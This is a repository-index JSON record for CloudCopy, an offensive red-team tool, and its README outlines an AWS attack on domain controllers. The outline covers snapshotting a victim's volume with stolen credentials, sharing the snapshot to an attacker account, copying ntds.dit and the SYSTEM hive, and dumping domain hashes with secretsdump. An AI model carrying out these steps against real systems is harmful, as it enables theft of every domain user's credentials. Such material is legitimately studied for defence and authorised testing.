{"id":13782625,"url":"https://github.com/Static-Flow/CloudCopy","last_synced_at":"2025-05-11T16:30:49.512Z","repository":{"id":99299716,"uuid":"187214147","full_name":"Static-Flow/CloudCopy","owner":"Static-Flow","description":"This tool implements a cloud version of the Shadow Copy attack against domain controllers running in AWS using only the EC2:CreateSnapshot permission.","archived":false,"fork":false,"pushed_at":"2019-11-02T17:36:26.000Z","size":43314,"stargazers_count":114,"open_issues_count":0,"forks_count":21,"subscribers_count":4,"default_branch":"master","last_synced_at":"2024-08-03T18:16:41.835Z","etag":null,"topics":["hacking-tool","python3","redteam"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Static-Flow.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2019-05-17T12:40:04.000Z","updated_at":"2024-06-24T06:03:12.000Z","dependencies_parsed_at":"2023-05-09T13:31:20.408Z","dependency_job_id":null,"html_url":"https://github.com/Static-Flow/CloudCopy","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Static-Flow%2FCloudCopy","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Static-Flow%2FCloudCopy/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Static-Flow%2FCloudCopy/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Static-Flow%2FCloudCopy/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Static-Flow","download_url":"https://codeload.github.com/Static-Flow/CloudCopy/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":225068711,"owners_count":17416119,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["hacking-tool","python3","redteam"],"created_at":"2024-08-03T18:01:40.254Z","updated_at":"2024-11-17T17:31:53.536Z","avatar_url":"https://github.com/Static-Flow.png","language":"Python","funding_links":[],"categories":["0x02 工具 :hammer_and_wrench:"],"sub_categories":["1 云服务工具"],"readme":"# CloudCopy\nThis tool implements a cloud version of the Shadow Copy attack against domain controllers running in AWS. Any AWS user possessing the EC2:CreateSnapshot permission can steal the hashes of all domain users by creating a snapshot of the Domain Controller mounting it to an instance they control and exporting the NTDS.dit and SYSTEM registry hive file for use with Impacket's secretsdump project.\n\n# Demos\n\nCloudCopy in Profile mode running against an AWS Domain Controller with an unencrypted Volume\n![](demos/unencrypted.gif)\n\nCloudCopy in Manual mode running against an AWS Domain Controller with an encrypted Volume\n![](demos/encrypted.gif)\n\n# Detailed CloudCopy Algorithm\n1.  Load AWS CLI with Victim Credentials that have at least CreateSnapshot permissions\n2.  Run \"Describe-Instances\" and show in list for attacker to select\n3.  Run \"Create-Snapshot\" on volume of selected instance\n4.  Run \"modify-snapshot-attribute\" on new snapshot to set \"createVolumePermission\" to attacker AWS Account\n5.  Load AWS CLI with Attacker Credentials\n6.  Run \"run-instance\" command to create new linux ec2 with our stolen snapshot\n7.  Ssh run \"sudo mkdir /windows\"\n8.  Ssh run \"sudo mount /dev/xvdf1 /windows/\"\n9.  Ssh run \"sudo cp /windows/Windows/NTDS/ntds.dit /home/ec2-user\"\n10. Ssh run \"sudo cp /windows/Windows/System32/config/SYSTEM /home/ec2-user\"\n11. Ssh run \"sudo chown ec2-user:ec2-user /home/ec2-user/*\"\n12. SFTP get \"/home/ec2-user/SYSTEM ./SYSTEM\"\n13. SFTP get \"/home/ec2-user/ntds.dit ./ntds.dit\"\n14. locally run \"secretsdump.py -system ./SYSTEM -ntds ./ntds.dit local -outputfile secrets #expects secretsdump to be on path\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FStatic-Flow%2FCloudCopy","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FStatic-Flow%2FCloudCopy","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FStatic-Flow%2FCloudCopy/lists"}